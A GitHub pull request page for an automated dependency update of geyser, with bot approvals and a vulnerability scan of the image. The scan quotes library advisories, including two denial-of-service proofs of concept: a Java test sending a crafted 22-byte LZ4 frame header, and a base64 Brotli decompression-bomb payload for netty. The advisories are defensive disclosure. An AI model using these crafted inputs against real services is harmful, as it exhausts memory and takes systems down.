Skip to content

chore(deps): update geyser to v2.10.0.1144#21718

Merged
github-actions[bot] merged 1 commit into
mainfrom
renovate/geyser-2.10.x
May 11, 2026
Merged

chore(deps): update geyser to v2.10.0.1144#21718
github-actions[bot] merged 1 commit into
mainfrom
renovate/geyser-2.10.x

Conversation

@uniget-bot
Copy link
Copy Markdown

@uniget-bot uniget-bot commented May 9, 2026

This PR contains the following updates:

Package Update Change
geyser patch 2.10.0.11382.10.0.1144

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.


Release Notes

uniget-org/renovate-custom (geyser)

v2.10.0.1144: geyser v2.10.0.1144

Compare Source

Custom release of geyser v2.10.0.1144

v2.10.0.1141: geyser v2.10.0.1141

Compare Source

Custom release of geyser v2.10.0.1141

v2.10.0.1140: geyser v2.10.0.1140

Compare Source

Custom release of geyser v2.10.0.1140


Configuration

📅 Schedule: (in timezone Europe/Berlin)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate.

Copy link
Copy Markdown

@nicholasdille-bot nicholasdille-bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Auto-approved because label type/renovate is present.

@github-actions
Copy link
Copy Markdown

github-actions Bot commented May 9, 2026

🔍 Vulnerabilities of ghcr.io/uniget-org/tools/geyser:2.10.0.1144

📦 Image Reference ghcr.io/uniget-org/tools/geyser:2.10.0.1144
digestsha256:5cbf8787faea292b39a395b90468f7cace59753964b005483e9ad0407e5e4dbd
vulnerabilitiescritical: 0 high: 3 medium: 5 low: 1
platformlinux/amd64
size42 MB
packages51
critical: 0 high: 1 medium: 1 low: 0 io.netty/netty-codec 4.1.101.Final (maven)

pkg:maven/io.netty/netty-codec@4.1.101.Final

high 7.5: CVE--2026--42583 Uncontrolled Resource Consumption

Affected range<=4.1.132.Final
Fixed version4.1.133.Final
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Description

Summary

Lz4FrameDecoder allocates a ByteBuf of size decompressedLength (up to 32 MB per block) before LZ4 runs. A peer only needs a 21-byte header plus compressedLength payload bytes - 22 bytes if compressedLength == 1 - to force that allocation.

Details

io.netty.handler.codec.compression.Lz4FrameDecoder#decode
Header fields are trusted for sizing. On the compressed path, after readableBytes >= compressedLength, the decoder does ctx.alloc().buffer(decompressedLength, decompressedLength) then decompresses.

PoC

The test below demonstrates how an attacker sending 22 bytes will force the server to allocate 32MB

    @<!-- -->Test
    void test() throws Exception {
        EventLoopGroup workerGroup = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());
        try {
            AtomicReference<Throwable> serverError = new AtomicReference<>();
            CountDownLatch latch = new CountDownLatch(1);

            ServerBootstrap server = new ServerBootstrap()
                    .group(workerGroup)
                    .channel(NioServerSocketChannel.class)
                    .childHandler(new ChannelInitializer<SocketChannel>() {
                        @<!-- -->Override
                        protected void initChannel(SocketChannel ch) {
                            ch.pipeline()
                                    .addLast(new Lz4FrameDecoder())
                                    .addLast(new ChannelInboundHandlerAdapter() {
                                        @<!-- -->Override
                                        public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {
                                            if (cause instanceof DecoderException) {
                                                serverError.set(cause.getCause());
                                            } else {
                                                serverError.set(cause);
                                            }
                                            latch.countDown();
                                        }
                                    });
                        }
                    });

            ChannelFuture serverChannel = server.bind(0).sync();

            Bootstrap client = new Bootstrap()
                    .group(workerGroup)
                    .channel(NioSocketChannel.class)
                    .handler(new ChannelInboundHandlerAdapter() {
                        @<!-- -->Override
                        public void channelActive(ChannelHandlerContext ctx) {
                            ByteBuf buf = ctx.alloc().buffer(22, 22);
                            buf.writeLong(MAGIC_NUMBER);
                            buf.writeByte(BLOCK_TYPE_COMPRESSED | 0x0F);
                            buf.writeIntLE(1);
                            buf.writeIntLE(1 << 25);
                            buf.writeIntLE(0);
                            buf.writeByte(0);

                            ctx.writeAndFlush(buf);

                            ctx.fireChannelActive();
                        }
                    });

            ChannelFuture clientChannel = client.connect(serverChannel.channel().localAddress()).sync();

            assertTrue(latch.await(10, TimeUnit.SECONDS));

            assertInstanceOf(IndexOutOfBoundsException.class, serverError.get());

            clientChannel.channel().close();
            serverChannel.channel().close();
        } finally {
            workerGroup.shutdownGracefully();
        }
    }

Impact

Untrusted senders without per-channel / aggregate limits can stress memory with many small requests.

medium 6.9: CVE--2025--58057 Improper Handling of Highly Compressed Data (Data Amplification)

Affected range<4.1.125.Final
Fixed version4.1.125.Final
CVSS Score6.9
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
EPSS Score0.062%
EPSS Percentile19th percentile
Description

Summary

With specially crafted input, BrotliDecoder and some other decompressing decoders will allocate a large number of reachable byte buffers, which can lead to denial of service.

Details

BrotliDecoder.decompress has no limit in how often it calls pull, decompressing data 64K bytes at a time. The buffers are saved in the output list, and remain reachable until OOM is hit. This is basically a zip bomb.

Tested on 4.1.118, but there were no changes to the decoder since.

PoC

Run this test case with -Xmx1G:

import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;

import java.util.Base64;

public class T {
    public static void main(String[] args) {
        EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());
        channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode("aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=")));
    }
}

Error:

Exception in thread "main" java.lang.OutOfMemoryError: Cannot reserve 4194304 bytes of direct buffer memory (allocated: 1069580289, limit: 1073741824)
	at java.base/java.nio.Bits.reserveMemory(Bits.java:178)
	at java.base/java.nio.DirectByteBuffer.<init>(DirectByteBuffer.java:121)
	at java.base/java.nio.ByteBuffer.allocateDirect(ByteBuffer.java:332)
	at io.netty.buffer.PoolArena$DirectArena.allocateDirect(PoolArena.java:718)
	at io.netty.buffer.PoolArena$DirectArena.newChunk(PoolArena.java:693)
	at io.netty.buffer.PoolArena.allocateNormal(PoolArena.java:213)
	at io.netty.buffer.PoolArena.tcacheAllocateNormal(PoolArena.java:195)
	at io.netty.buffer.PoolArena.allocate(PoolArena.java:137)
	at io.netty.buffer.PoolArena.allocate(PoolArena.java:127)
	at io.netty.buffer.PooledByteBufAllocator.newDirectBuffer(PooledByteBufAllocator.java:403)
	at io.netty.buffer.AbstractByteBufAllocator.directBuffer(AbstractByteBufAllocator.java:188)
	at io.netty.buffer.AbstractByteBufAllocator.directBuffer(AbstractByteBufAllocator.java:179)
	at io.netty.buffer.AbstractByteBufAllocator.buffer(AbstractByteBufAllocator.java:116)
	at io.netty.handler.codec.compression.BrotliDecoder.pull(BrotliDecoder.java:70)
	at io.netty.handler.codec.compression.BrotliDecoder.decompress(BrotliDecoder.java:101)
	at io.netty.handler.codec.compression.BrotliDecoder.decode(BrotliDecoder.java:137)
	at io.netty.handler.codec.ByteToMessageDecoder.decodeRemovalReentryProtection(ByteToMessageDecoder.java:530)
	at io.netty.handler.codec.ByteToMessageDecoder.callDecode(ByteToMessageDecoder.java:469)
	at io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:290)
	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)
	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
	at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)
	at io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1357)
	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)
	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
	at io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:868)
	at io.netty.channel.embedded.EmbeddedChannel.writeInbound(EmbeddedChannel.java:348)
	at io.netty.handler.codec.compression.T.main(T.java:11)

Impact

DoS for anyone using BrotliDecoder on untrusted input.

critical: 0 high: 1 medium: 0 low: 0 io.netty/netty-transport-native-epoll 4.2.7.Final (maven)

pkg:maven/io.netty/netty-transport-native-epoll@4.2.7.Final

high 7.5: CVE--2026--42577 Missing Release of Resource after Effective Lifetime

Affected range<4.2.13.Final
Fixed version4.2.13.Final
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Description

Summary

Netty's epoll transport fails to detect and close TCP connections that receive a RST after being half-closed, leading to stale channels that are never cleaned up and, in some code paths, a 100% CPU busy-loop in the event loop thread.

Affected versions

All versions of 4.2.x netty-transport-native-epoll up to and including 4.2.12.Final

Fixed in

4.2.13.Final (fix merged into the 4.2 branch via #16689; release not yet cut as of 2026-04-25).

Severity

Medium — Denial of Service (resource exhaustion / CPU spin)

CWE: CWE-772: Missing Release of Resource after Effective Lifetime

Description

When a TCP connection using Netty's epoll transport has ALLOW_HALF_CLOSURE enabled (or is in a half-closed state via the HTTP codec), and the remote peer:

  1. Sends a FIN (half-close), causing the server to mark the input as shutdown, then
  2. Sends a RST (e.g. by closing with SO_LINGER=0)

the server-side channel is never closed. This happens because:

  • epollOutReady() is a no-op when there is no pending flush.
  • epollInReady() short-circuits via shouldBreakEpollInReady() because input is already marked as shutdown.
  • The EPOLLERR/EPOLLHUP error condition is therefore never processed, and channelInactive is never fired.

Depending on the Netty version and configuration, this results in:

  • Stale channels: The connection is never closed or deregistered. An unauthenticated remote attacker can repeat the sequence to accumulate stale connections, exhausting file descriptors, memory, or connection-count limits.
  • CPU busy-loop: In code paths where clearEpollIn0() is not called during the ChannelInputShutdownReadComplete event, epoll_wait returns immediately on every iteration for the affected fd, causing 100% CPU utilization on the event loop thread and starving all other connections multiplexed on it.

Mitigation

  • Upgrade to 4.2.13.Final when released (or build from the 4.2 branch at commit 0ec3d97).
  • If upgrading is not immediately possible, configure idle timeouts on connections to limit the lifetime of stale channels.

Resources

critical: 0 high: 1 medium: 0 low: 0 io.airlift/aircompressor 0.27 (maven)

pkg:maven/io.airlift/aircompressor@0.27

high 8.2: CVE--2025--67721 Out-of-bounds Read

Affected range<2.0.3
Fixed version2.0.3
CVSS Score8.2
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
EPSS Score0.065%
EPSS Percentile20th percentile
Description

Summary

Incorrect handling of malformed data in Java-based decompressor implementations for Snappy and LZ4 allows remote attackers to read previous buffer contents via crafted compressed input. In applications where the output buffer is reused without being cleared, this may lead to disclosure of sensitive data.

Details

With certain crafted compressed inputs, elements from the output buffer can end up in the uncompressed output. This is relevant for applications that reuse the same output buffer to uncompress multiple inputs. This can be the case of a web server that allocates a fix-sized buffer for performance purposes. This is similar to GHSA-cmp6-m4wj-q63q.

Impact

Applications using aircompressor as described above may leak sensitive information to external unauthorized attackers.

Mitigation

The vulnerability is fixed in release 3.4 and 2.0.3. However, it can be mitigated by either:

  • Avoiding reuse of the decompression buffer across calls
  • Clearing the decompression buffer before a call to decompress data
critical: 0 high: 0 medium: 3 low: 0 org.apache.logging.log4j/log4j-core 2.20.0 (maven)

pkg:maven/org.apache.logging.log4j/log4j-core@2.20.0

medium 6.9: CVE--2026--34480 Improper Encoding or Escaping of Output

Affected range>=2.0-alpha1
<2.25.4
Fixed version2.25.4
CVSS Score6.9
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N
EPSS Score0.153%
EPSS Percentile36th percentile
Description

Apache Log4j Core's XmlLayout, in versions up to and including 2.25.3, fails to sanitize characters forbidden by the XML 1.0 specification, producing invalid XML output whenever a log message or MDC value contains such characters.

The impact depends on the StAX implementation in use:

  • JRE built-in StAX: Forbidden characters are silently written to the output, producing malformed XML. Conforming parsers must reject such documents with a fatal error, which may cause downstream log-processing systems to drop the affected records.
  • Alternative StAX implementations (e.g., Woodstox, a transitive dependency of the Jackson XML Dataformat module): An exception is thrown during the logging call, and the log event is never delivered to its intended appender, only to Log4j's internal status logger.

Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue by sanitizing forbidden characters before XML output.

medium 6.3: CVE--2026--34477 Improper Validation of Certificate with Host Mismatch

Affected range>=2.12.0
<2.25.4
Fixed version2.25.4
CVSS Score6.3
CVSS VectorCVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:L/SA:N
EPSS Score0.107%
EPSS Percentile28th percentile
Description

The fix for CVE-2025-68161 was incomplete: it addressed hostname verification only when enabled via the log4j2.sslVerifyHostName system property, but not when configured through the verifyHostName attribute of the <Ssl> element.

Although the verifyHostName configuration attribute was introduced in Log4j Core 2.12.0, it was silently ignored in all versions through 2.25.3, leaving TLS connections vulnerable to interception regardless of the configured value.

A network-based attacker may be able to perform a man-in-the-middle attack when all of the following conditions are met:

  • An SMTP, Socket, or Syslog appender is in use.
  • TLS is configured via a nested element.
  • The attacker can present a certificate issued by a CA trusted by the appender's configured trust store, or by the default Java trust store if none is configured.

This issue does not affect users of the HTTP appender, which uses a separate verifyHostname attribute that was not subject to this bug and verifies host names by default.

Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue.

medium 6.3: CVE--2025--68161 Improper Validation of Certificate with Host Mismatch

Affected range>=2.0-beta9
<2.25.3
Fixed version2.25.3
CVSS Score6.3
CVSS VectorCVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:L/SA:N
EPSS Score0.026%
EPSS Percentile7th percentile
Description

The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does not perform TLS hostname verification of the peer certificate, even when the verifyHostName configuration attribute or the log4j2.sslVerifyHostName system property is set to true.

This issue may allow a man-in-the-middle attacker to intercept or redirect log traffic under the following conditions:

  • The attacker is able to intercept or redirect network traffic between the client and the log receiver.
  • The attacker can present a server certificate issued by a certification authority trusted by the Socket Appender’s configured trust store (or by the default Java trust store if no custom trust store is configured).

Users are advised to upgrade to Apache Log4j Core version 2.25.3, which addresses this issue.

As an alternative mitigation, the Socket Appender may be configured to use a private or restricted trust root to limit the set of trusted certificates.

critical: 0 high: 0 medium: 1 low: 1 com.google.guava/guava 31.0.1-jre (maven)

pkg:maven/com.google.guava/guava@31.0.1-jre

medium 5.5: CVE--2023--2976 Creation of Temporary File in Directory with Insecure Permissions

Affected range>=1.0
<32.0.0-android
Fixed version32.0.0-android
CVSS Score5.5
CVSS VectorCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
EPSS Score0.065%
EPSS Percentile20th percentile
Description

Use of Java's default temporary directory for file creation in FileBackedOutputStream in Google Guava versions 1.0 to 31.1 on Unix systems and Android Ice Cream Sandwich allows other users and apps on the machine with access to the default Java temporary directory to be able to access the files created by the class.

Even though the security vulnerability is fixed in version 32.0.0, maintainers recommend using version 32.0.1 as version 32.0.0 breaks some functionality under Windows.

low 3.3: CVE--2020--8908 Improper Handling of Alternate Encoding

Affected range<32.0.0-android
Fixed version32.0.0-android
CVSS Score3.3
CVSS VectorCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
EPSS Score0.072%
EPSS Percentile22nd percentile
Description

A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava com.google.common.io.Files.createTempDir(). The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.

Copy link
Copy Markdown

@nicholasdille-bot nicholasdille-bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Auto-approved because label type/renovate is present.

@uniget-bot uniget-bot changed the title chore(deps): update geyser to v2.10.0.1140 chore(deps): update geyser to v2.10.0.1141 May 10, 2026
@uniget-bot uniget-bot force-pushed the renovate/geyser-2.10.x branch from 16e5d68 to 536a199 Compare May 11, 2026 04:25
@uniget-bot uniget-bot changed the title chore(deps): update geyser to v2.10.0.1141 chore(deps): update geyser to v2.10.0.1144 May 11, 2026
Copy link
Copy Markdown

@nicholasdille-bot nicholasdille-bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Auto-approved because label type/renovate is present.

@uniget-bot uniget-bot force-pushed the renovate/geyser-2.10.x branch from 536a199 to d19df35 Compare May 11, 2026 08:25
@github-actions
Copy link
Copy Markdown

Attempting automerge. See https://github.com/uniget-org/tools/actions/runs/25659381850.

@github-actions
Copy link
Copy Markdown

PR is clean and can be merged. See https://github.com/uniget-org/tools/actions/runs/25659381850.

@github-actions github-actions Bot merged commit 14f7497 into main May 11, 2026
9 checks passed
@github-actions github-actions Bot deleted the renovate/geyser-2.10.x branch May 11, 2026 08:40
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants